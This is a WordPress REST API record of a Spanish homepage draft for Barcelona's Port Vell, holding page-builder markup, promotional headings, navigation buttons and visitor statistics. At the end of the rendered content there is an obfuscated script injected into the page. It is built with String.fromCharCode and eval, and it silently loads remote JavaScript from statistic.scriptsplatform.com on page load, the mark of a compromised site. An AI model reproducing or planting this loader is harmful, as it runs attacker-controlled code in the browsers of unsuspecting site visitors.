{"id":13891,"date":"2023-07-25T12:40:12","date_gmt":"2023-07-25T10:40:12","guid":{"rendered":"https:\/\/portvellbcn.cat\/pruf-home\/"},"modified":"2023-07-25T12:40:34","modified_gmt":"2023-07-25T10:40:34","slug":"pruf-home","status":"publish","type":"page","link":"https:\/\/portvellbcn.cat\/es\/pruf-home\/","title":{"rendered":"Pruf-Home"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row full_width=\u00bbstretch_row_content\u00bb css=\u00bb.vc_custom_1612433157816{margin-top: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\u00bb el_id=\u00bbvideo\u00bb el_class=\u00bb.vc-col-xs-margin-top-0&#8243;][vc_column css_animation=\u00bbfadeInDown\u00bb css=\u00bb.vc_custom_1553603988485{margin-bottom: 80px !important;}\u00bb][vc_raw_html css=\u00bb.vc_custom_1624349707855{padding-right: -30px !important;padding-left: -30px !important;}\u00bb]CTxkaXYgY2xhc3M9InZpZGVvLWJhY2tncm91bmQiPgoJCTx2aWRlbyBtdXRlZD0iIiBpZD0icGxheWVyIiBwcmVsb2FkPSJub25lIiBwb3N0ZXI9InZpZGVvL2JpZy1idWNrLWJ1bm55LmpwZyIgYXV0b3BsYXk9ImF1dG9wbGF5IiBsb29wPSJsb29wIj4KCQkJPHNvdXJjZSBzcmM9Imh0dHBzOi8vd3d3LnBvcnR2ZWxsYmNuLmNhdC93cC1jb250ZW50L3VwbG9hZHMvMjAyMS8wNi9QT1JUVkVMTF8yMDIxX0NBVF9IMjY0XzIubXA0IiB0eXBlPSJ2aWRlby9tcDQiPgoJCQkKCQk8L3NvdXJjZT48L3ZpZGVvPgoJCTxkaXYgaWQ9Im11dGUiIGNsYXNzPSJidG4iPjwvZGl2Pgo8L2Rpdj4=[\/vc_raw_html][\/vc_column][\/vc_row][vc_row equal_height=\u00bbyes\u00bb content_placement=\u00bbmiddle\u00bb css=\u00bb.vc_custom_1612433103759{margin-top: 60px !important;margin-bottom: 80px !important;}\u00bb el_id=\u00bbinicio\u00bb][vc_column css_animation=\u00bbfadeInDown\u00bb css=\u00bb.vc_custom_1553603988485{margin-bottom: 80px !important;}\u00bb][vc_animated_icon icon_sharpicons=\u00bbsi-arrows-bottom-big-arrow-1&#8243; align=\u00bbcenter\u00bb css_animation=\u00bbnone\u00bb color=\u00bb#ff6600&#8243; size=\u00bb50&#8243; el_class=\u00bbbounce\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center; letter-spacing: 4px;\"><span style=\"color: #999999; font-size: 14px;\"><span style=\"font-family: Rubik, sans-serif;\">EXPLORA EL PORT VELL<\/span><\/span><\/p>\n<p>[\/vc_column_text][\/vc_column][vc_column css_animation=\u00bbfadeInLeft\u00bb width=\u00bb1\/2&#8243;][vc_column_text css=\u00bb.vc_custom_1582614138113{margin-bottom: 25px !important;}\u00bb]<\/p>\n<p><span class=\"s1\" style=\"font-size: 50px; color: #333333;\"><span style=\"letter-spacing: 1px;\"><span style=\"line-height: 1.2em; display: inline-block; width: 100%;\"><span class=\"titulofuente\" style=\"font-family: 'Playfair Display', sans-serif;\">Un puerto, una ciudad, una historia compartida entre Barcelona y el mar<\/span><\/span><\/span><\/span><\/p>\n<p>[\/vc_column_text][vc_btn title=\u00bbVer m\u00e1s\u00bb style=\u00bboutline\u00bb shape=\u00bbround\u00bb color=\u00bbblack\u00bb link=\u00bburl:https%3A%2F%2Fportvellbcn.cat%2Fes%2Fquienes-somos%2F|target:%20_blank|\u00bb el_class=\u00bbboton1home\u00bb][\/vc_column][vc_column css_animation=\u00bbfadeInRight\u00bb width=\u00bb1\/2&#8243; css=\u00bb.vc_custom_1611662275510{padding-top: 170px !important;padding-bottom: 170px !important;background-image: url(https:\/\/portvellbcn.cat\/wp-content\/uploads\/2020\/12\/Foto_Historia_compartida_editada.jpg?id=7724) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\u00bb][\/vc_column][\/vc_row][vc_row][vc_column][\/vc_column][\/vc_row][vc_row][vc_column][\/vc_column][\/vc_row][vc_section full_width=\u00bbstretch_row\u00bb css=\u00bb.vc_custom_1595315193967{padding-top: 10px !important;padding-bottom: 00px !important;}\u00bb][vc_row full_width=\u00bbstretch_row_content\u00bb][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1678274084318{padding-top: 200px !important;padding-bottom: 200px !important;background-image: url(https:\/\/portvellbcn.cat\/wp-content\/uploads\/2023\/03\/homepruf1.jpg?id=12040) !important;}\u00bb][vc_btn title=\u00bbAlquiler de espacios\u00bb style=\u00bbcustom\u00bb custom_background=\u00bb#ff9804&#8243; custom_text=\u00bb#ffffff\u00bb shape=\u00bbround\u00bb size=\u00bblg\u00bb align=\u00bbcenter\u00bb css=\u00bb.vc_custom_1678274181632{margin-top: 0px !important;padding-bottom: 30px !important;}\u00bb link=\u00bburl:https%3A%2F%2Fportvellbcn.cat%2Fes%2Falquiler-de-espacios%2F|target:_blank|\u00bb][\/vc_column][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1678274116494{padding-top: 200px !important;padding-bottom: 200px !important;background-image: url(https:\/\/portvellbcn.cat\/wp-content\/uploads\/2023\/03\/homepruf1.jpg?id=12040) !important;}\u00bb][vc_btn title=\u00bbEspacios P\u00fablico\u00bb style=\u00bbcustom\u00bb custom_background=\u00bb#ff9804&#8243; custom_text=\u00bb#ffffff\u00bb shape=\u00bbround\u00bb size=\u00bblg\u00bb align=\u00bbcenter\u00bb css=\u00bb.vc_custom_1678273613806{margin-top: 0px !important;padding-bottom: 30px !important;}\u00bb link=\u00bburl:https%3A%2F%2Fportvellbcn.cat%2Fca%2Fsingle-work%2Fespai-public%2F|target:_blank|\u00bb][\/vc_column][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1678274130285{padding-top: 200px !important;padding-bottom: 200px !important;background-image: url(https:\/\/portvellbcn.cat\/wp-content\/uploads\/2023\/03\/homepruf1.jpg?id=12040) !important;}\u00bb][vc_btn title=\u00bbExplora el Port Vell\u00bb style=\u00bbcustom\u00bb custom_background=\u00bb#ff9804&#8243; custom_text=\u00bb#ffffff\u00bb shape=\u00bbround\u00bb size=\u00bblg\u00bb align=\u00bbcenter\u00bb css=\u00bb.vc_custom_1678273620574{margin-top: 0px !important;padding-bottom: 30px !important;}\u00bb link=\u00bburl:https%3A%2F%2Fportvellbcn.cat%2Fes%2Fexplora-portvell%2F|target:_blank|\u00bb][\/vc_column][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1678274143426{padding-top: 200px !important;padding-bottom: 200px !important;background-image: url(https:\/\/portvellbcn.cat\/wp-content\/uploads\/2023\/03\/homepruf1.jpg?id=12040) !important;}\u00bb][vc_btn title=\u00bbActividades\u00bb style=\u00bbcustom\u00bb custom_background=\u00bb#ff9804&#8243; custom_text=\u00bb#ffffff\u00bb shape=\u00bbround\u00bb size=\u00bblg\u00bb align=\u00bbcenter\u00bb css=\u00bb.vc_custom_1678274235407{margin-top: 0px !important;padding-bottom: 30px !important;}\u00bb link=\u00bburl:https%3A%2F%2Fportvellbcn.cat%2Fes%2Factividades-en-el-portvell%2F|target:_blank|\u00bb][\/vc_column][\/vc_row][vc_row full_width=\u00bbstretch_row\u00bb content_placement=\u00bbmiddle\u00bb parallax=\u00bbcontent-moving\u00bb parallax_speed_bg=\u00bb1.7&#8243; css=\u00bb.vc_custom_1561019507933{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 20px !important;padding-bottom: 0px !important;background-color: #ffffff !important;background-position: center;background-repeat: no-repeat !important;background-size: cover !important;}\u00bb][vc_column css_animation=\u00bbfadeInUp\u00bb width=\u00bb3\/4&#8243;][vc_column_text css_animation=\u00bbnone\u00bb css=\u00bb.vc_custom_1612424133391{margin-bottom: 0px !important;}\u00bb]<\/p>\n<p><strong><span class=\"s1\" style=\"font-size: 30px; color: #333333;\"><span style=\"letter-spacing: 1px;\"><span style=\"line-height: 1.2em; display: inline-block; width: 100%;\"><span class=\"titulofuente\" style=\"font-family: 'Playfair Display', sans-serif;\">Acceso a la plataforma de Licitaci\u00f3n Electr\u00f3nica de la Gerencia Urban\u00edstica del Port Vell  <\/span><\/span><\/span><\/span><\/strong><\/p>\n<p>[\/vc_column_text][\/vc_column][vc_column css_animation=\u00bbfadeInUp\u00bb width=\u00bb1\/4&#8243;][vc_btn title=\u00bbVER M\u00c1S\u00bb style=\u00bbcustom\u00bb custom_background=\u00bb#0073cf\u00bb custom_text=\u00bb#ffffff\u00bb shape=\u00bbround\u00bb size=\u00bblg\u00bb css=\u00bb.vc_custom_1554112476586{margin-top: 0px !important;padding-bottom: 30px !important;}\u00bb link=\u00bburl:https%3A%2F%2Fcommunity.vortal.biz%2FPRODSTS%2FUsers%2FLogin%2FIndex%3FSkinName%3Dportvell|target:%20_blank|\u00bb][\/vc_column][\/vc_row][vc_row][vc_column][\/vc_column][\/vc_row][vc_row full_width=\u00bbstretch_row_content_no_spaces\u00bb css=\u00bb.vc_custom_1612422928898{background-image: url(https:\/\/portvellbcn.cat\/wp-content\/uploads\/2021\/02\/aerea-portvell-02.jpg?id=9117) !important;}\u00bb][vc_column css=\u00bb.vc_custom_1612424217145{padding-top: 150px !important;padding-bottom: 150px !important;}\u00bb][vc_row_inner][vc_column_inner width=\u00bb1\/4&#8243;][\/vc_column_inner][vc_column_inner width=\u00bb1\/2&#8243;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><span class=\"s1\" style=\"font-size: 53px; color: #ffffff;\"><span style=\"letter-spacing: 1px;\"><span style=\"line-height: 1.2em; display: inline-block; width: 100%;\"><span class=\"titulofuente\" style=\"font-family: 'Playfair Display', sans-serif;\">El Port Vell, El puerto-ciudad<br \/>\nde Barcelona<\/span><\/span><\/span><\/span><\/p>\n<p>[\/vc_column_text][vc_btn title=\u00bbVer m\u00e1s\u00bb style=\u00bboutline\u00bb shape=\u00bbround\u00bb align=\u00bbcenter\u00bb link=\u00bburl:https%3A%2F%2Fportvellbcn.cat%2Fes%2Fque-es-el-portvell%2F|target:%20_blank|\u00bb][\/vc_column_inner][vc_column_inner width=\u00bb1\/4&#8243;][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row full_width=\u00bbstretch_row\u00bb equal_height=\u00bbyes\u00bb content_placement=\u00bbmiddle\u00bb vidbg_vc_tap_to_unmute=\u00bbtrue\u00bb css=\u00bb.vc_custom_1595315275127{margin-top: 0px !important;padding-top: 50px !important;padding-bottom: 60px !important;}\u00bb el_id=\u00bbfinal\u00bb][vc_column css=\u00bb.vc_custom_1553603804501{border-bottom-width: 150px !important;}\u00bb][vc_column_text css_animation=\u00bbfadeInDown\u00bb css=\u00bb.vc_custom_1553603821613{border-bottom-width: 150px !important;}\u00bb]<\/p>\n<p style=\"text-align: center; letter-spacing: 4px;\"><span style=\"color: #999999; font-size: 14px;\"><span style=\"font-family: Oswald, sans-serif;\"><span style=\"font-family: Rubik, sans-serif;\">CIFRAS Y DATOS<\/span><\/span><\/span><\/p>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][\/vc_section][vc_row css=\u00bb.vc_custom_1595315244083{padding-bottom: 60px !important;}\u00bb][vc_column width=\u00bb1\/4&#8243;][vc_counter align=\u00bbcenter\u00bb google_fonts=\u00bbfont_family:Poppins%3A300%2Cregular%2C500%2C600%2C700|font_style:400%20regular%3A400%3Anormal\u00bb start=\u00bb0&#8243; end=\u00bb70&#8243; speed=\u00bb4&#8243; font_size=\u00bb70&#8243; color=\u00bb#ff6600&#8243; css=\u00bb.vc_custom_1563527822687{margin-bottom: 20px !important;}\u00bb][vc_custom_heading text=\u00bbHect\u00e1reas de territorio\u00bb font_container=\u00bbtag:h6|text_align:center|color:%23161616&#8243; google_fonts=\u00bbfont_family:Poppins%3A300%2Cregular%2C500%2C600%2C700|font_style:400%20regular%3A400%3Anormal\u00bb][\/vc_column][vc_column width=\u00bb1\/4&#8243;][vc_counter align=\u00bbcenter\u00bb google_fonts=\u00bbfont_family:Poppins%3A300%2Cregular%2C500%2C600%2C700|font_style:400%20regular%3A400%3Anormal\u00bb start=\u00bb0&#8243; end=\u00bb330&#8243; speed=\u00bb4&#8243; font_size=\u00bb70&#8243; color=\u00bb#ff6600&#8243; css=\u00bb.vc_custom_1563527862171{margin-bottom: 20px !important;}\u00bb][vc_custom_heading text=\u00bbEmpresas\u00bb font_container=\u00bbtag:h6|text_align:center|color:%23161616&#8243; google_fonts=\u00bbfont_family:Poppins%3A300%2Cregular%2C500%2C600%2C700|font_style:400%20regular%3A400%3Anormal\u00bb][\/vc_column][vc_column width=\u00bb1\/4&#8243;][vc_counter align=\u00bbcenter\u00bb google_fonts=\u00bbfont_family:Poppins%3A300%2Cregular%2C500%2C600%2C700|font_style:400%20regular%3A400%3Anormal\u00bb start=\u00bb0&#8243; end=\u00bb7500&#8243; speed=\u00bb4&#8243; font_size=\u00bb70&#8243; color=\u00bb#ff6600&#8243; css=\u00bb.vc_custom_1612355395607{margin-bottom: 20px !important;}\u00bb][vc_custom_heading text=\u00bbPuestos de trabajos\u00bb font_container=\u00bbtag:h6|text_align:center|color:%23161616&#8243; google_fonts=\u00bbfont_family:Poppins%3A300%2Cregular%2C500%2C600%2C700|font_style:400%20regular%3A400%3Anormal\u00bb][\/vc_column][vc_column width=\u00bb1\/4&#8243;][vc_counter align=\u00bbcenter\u00bb google_fonts=\u00bbfont_family:Poppins%3A300%2Cregular%2C500%2C600%2C700|font_style:400%20regular%3A400%3Anormal\u00bb start=\u00bb0&#8243; end=\u00bb365&#8243; speed=\u00bb4&#8243; font_size=\u00bb70&#8243; color=\u00bb#ff6600&#8243; css=\u00bb.vc_custom_1563527843562{margin-bottom: 20px !important;}\u00bb][vc_custom_heading text=\u00bbD\u00edas de eventos al a\u00f1o\u00bb font_container=\u00bbtag:h6|text_align:center|color:%23161616&#8243; google_fonts=\u00bbfont_family:Poppins%3A300%2Cregular%2C500%2C600%2C700|font_style:400%20regular%3A400%3Anormal\u00bb][\/vc_column][\/vc_row]<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row full_width=\u00bbstretch_row_content\u00bb css=\u00bb.vc_custom_1612433157816{margin-top: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\u00bb el_id=\u00bbvideo\u00bb el_class=\u00bb.vc-col-xs-margin-top-0&#8243;][vc_column css_animation=\u00bbfadeInDown\u00bb css=\u00bb.vc_custom_1553603988485{margin-bottom: 80px !important;}\u00bb][vc_raw_html css=\u00bb.vc_custom_1624349707855{padding-right: -30px !important;padding-left: -30px !important;}\u00bb]CTxkaXYgY2xhc3M9InZpZGVvLWJhY2tncm91bmQiPgoJCTx2aWRlbyBtdXRlZD0iIiBpZD0icGxheWVyIiBwcmVsb2FkPSJub25lIiBwb3N0ZXI9InZpZGVvL2JpZy1idWNrLWJ1bm55LmpwZyIgYXV0b3BsYXk9ImF1dG9wbGF5IiBsb29wPSJsb29wIj4KCQkJPHNvdXJjZSBzcmM9Imh0dHBzOi8vd3d3LnBvcnR2ZWxsYmNuLmNhdC93cC1jb250ZW50L3VwbG9hZHMvMjAyMS8wNi9QT1JUVkVMTF8yMDIxX0NBVF9IMjY0XzIubXA0IiB0eXBlPSJ2aWRlby9tcDQiPgoJCQkKCQk8L3NvdXJjZT48L3ZpZGVvPgoJCTxkaXYgaWQ9Im11dGUiIGNsYXNzPSJidG4iPjwvZGl2Pgo8L2Rpdj4=[\/vc_raw_html][\/vc_column][\/vc_row][vc_row equal_height=\u00bbyes\u00bb content_placement=\u00bbmiddle\u00bb css=\u00bb.vc_custom_1612433103759{margin-top: 60px !important;margin-bottom: 80px !important;}\u00bb el_id=\u00bbinicio\u00bb][vc_column css_animation=\u00bbfadeInDown\u00bb css=\u00bb.vc_custom_1553603988485{margin-bottom: 80px !important;}\u00bb][vc_animated_icon icon_sharpicons=\u00bbsi-arrows-bottom-big-arrow-1&#8243; align=\u00bbcenter\u00bb css_animation=\u00bbnone\u00bb color=\u00bb#ff6600&#8243; size=\u00bb50&#8243; el_class=\u00bbbounce\u00bb][vc_column_text] EXPLORA EL PORT VELL [\/vc_column_text][\/vc_column][vc_column css_animation=\u00bbfadeInLeft\u00bb width=\u00bb1\/2&#8243;][vc_column_text css=\u00bb.vc_custom_1582614138113{margin-bottom: 25px !important;}\u00bb] Un puerto, una ciudad, una historia compartida entre Barcelona y el mar [\/vc_column_text][vc_btn title=\u00bbVer m\u00e1s\u00bb style=\u00bboutline\u00bb shape=\u00bbround\u00bb color=\u00bbblack\u00bb link=\u00bburl:https%3A%2F%2Fportvellbcn.cat%2Fes%2Fquienes-somos%2F|target:%20_blank|\u00bb el_class=\u00bbboton1home\u00bb][\/vc_column][vc_column css_animation=\u00bbfadeInRight\u00bb width=\u00bb1\/2&#8243; css=\u00bb.vc_custom_1611662275510{padding-top: 170px !important;padding-bottom: 170px !important;background-image: url(https:\/\/portvellbcn.cat\/wp-content\/uploads\/2020\/12\/Foto_Historia_compartida_editada.jpg?id=7724) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\u00bb][\/vc_column][\/vc_row][vc_row][vc_column][\/vc_column][\/vc_row][vc_row][vc_column][\/vc_column][\/vc_row][vc_section full_width=\u00bbstretch_row\u00bb css=\u00bb.vc_custom_1595315193967{padding-top: 10px !important;padding-bottom: 00px !important;}\u00bb][vc_row full_width=\u00bbstretch_row_content\u00bb][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1678274084318{padding-top: 200px !important;padding-bottom: 200px !important;background-image: url(https:\/\/portvellbcn.cat\/wp-content\/uploads\/2023\/03\/homepruf1.jpg?id=12040) !important;}\u00bb][vc_btn title=\u00bbAlquiler de espacios\u00bb style=\u00bbcustom\u00bb custom_background=\u00bb#ff9804&#8243; custom_text=\u00bb#ffffff\u00bb shape=\u00bbround\u00bb size=\u00bblg\u00bb align=\u00bbcenter\u00bb css=\u00bb.vc_custom_1678274181632{margin-top: 0px !important;padding-bottom: 30px !important;}\u00bb link=\u00bburl:https%3A%2F%2Fportvellbcn.cat%2Fes%2Falquiler-de-espacios%2F|target:_blank|\u00bb][\/vc_column][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1678274116494{padding-top: 200px !important;padding-bottom: 200px !important;background-image: url(https:\/\/portvellbcn.cat\/wp-content\/uploads\/2023\/03\/homepruf1.jpg?id=12040) !important;}\u00bb][vc_btn title=\u00bbEspacios P\u00fablico\u00bb style=\u00bbcustom\u00bb custom_background=\u00bb#ff9804&#8243; custom_text=\u00bb#ffffff\u00bb shape=\u00bbround\u00bb size=\u00bblg\u00bb align=\u00bbcenter\u00bb css=\u00bb.vc_custom_1678273613806{margin-top: 0px !important;padding-bottom: 30px !important;}\u00bb link=\u00bburl:https%3A%2F%2Fportvellbcn.cat%2Fca%2Fsingle-work%2Fespai-public%2F|target:_blank|\u00bb][\/vc_column][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1678274130285{padding-top: 200px !important;padding-bottom: 200px !important;background-image: url(https:\/\/portvellbcn.cat\/wp-content\/uploads\/2023\/03\/homepruf1.jpg?id=12040) !important;}\u00bb][vc_btn title=\u00bbExplora el Port Vell\u00bb style=\u00bbcustom\u00bb custom_background=\u00bb#ff9804&#8243; custom_text=\u00bb#ffffff\u00bb shape=\u00bbround\u00bb size=\u00bblg\u00bb align=\u00bbcenter\u00bb css=\u00bb.vc_custom_1678273620574{margin-top: 0px !important;padding-bottom: 30px !important;}\u00bb link=\u00bburl:https%3A%2F%2Fportvellbcn.cat%2Fes%2Fexplora-portvell%2F|target:_blank|\u00bb][\/vc_column][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1678274143426{padding-top: 200px !important;padding-bottom: 200px !important;background-image: url(https:\/\/portvellbcn.cat\/wp-content\/uploads\/2023\/03\/homepruf1.jpg?id=12040) !important;}\u00bb][vc_btn title=\u00bbActividades\u00bb style=\u00bbcustom\u00bb custom_background=\u00bb#ff9804&#8243; custom_text=\u00bb#ffffff\u00bb shape=\u00bbround\u00bb size=\u00bblg\u00bb align=\u00bbcenter\u00bb css=\u00bb.vc_custom_1678274235407{margin-top: 0px !important;padding-bottom: 30px !important;}\u00bb link=\u00bburl:https%3A%2F%2Fportvellbcn.cat%2Fes%2Factividades-en-el-portvell%2F|target:_blank|\u00bb][\/vc_column][\/vc_row][vc_row full_width=\u00bbstretch_row\u00bb content_placement=\u00bbmiddle\u00bb parallax=\u00bbcontent-moving\u00bb parallax_speed_bg=\u00bb1.7&#8243; css=\u00bb.vc_custom_1561019507933{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 20px !important;padding-bottom: 0px !important;background-color: #ffffff [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_acf_changed":false,"footnotes":""},"class_list":["post-13891","page","type-page","status-publish","hentry"],"acf":[],"_links":{"self":[{"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/pages\/13891","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/comments?post=13891"}],"version-history":[{"count":0,"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/pages\/13891\/revisions"}],"wp:attachment":[{"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/media?parent=13891"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}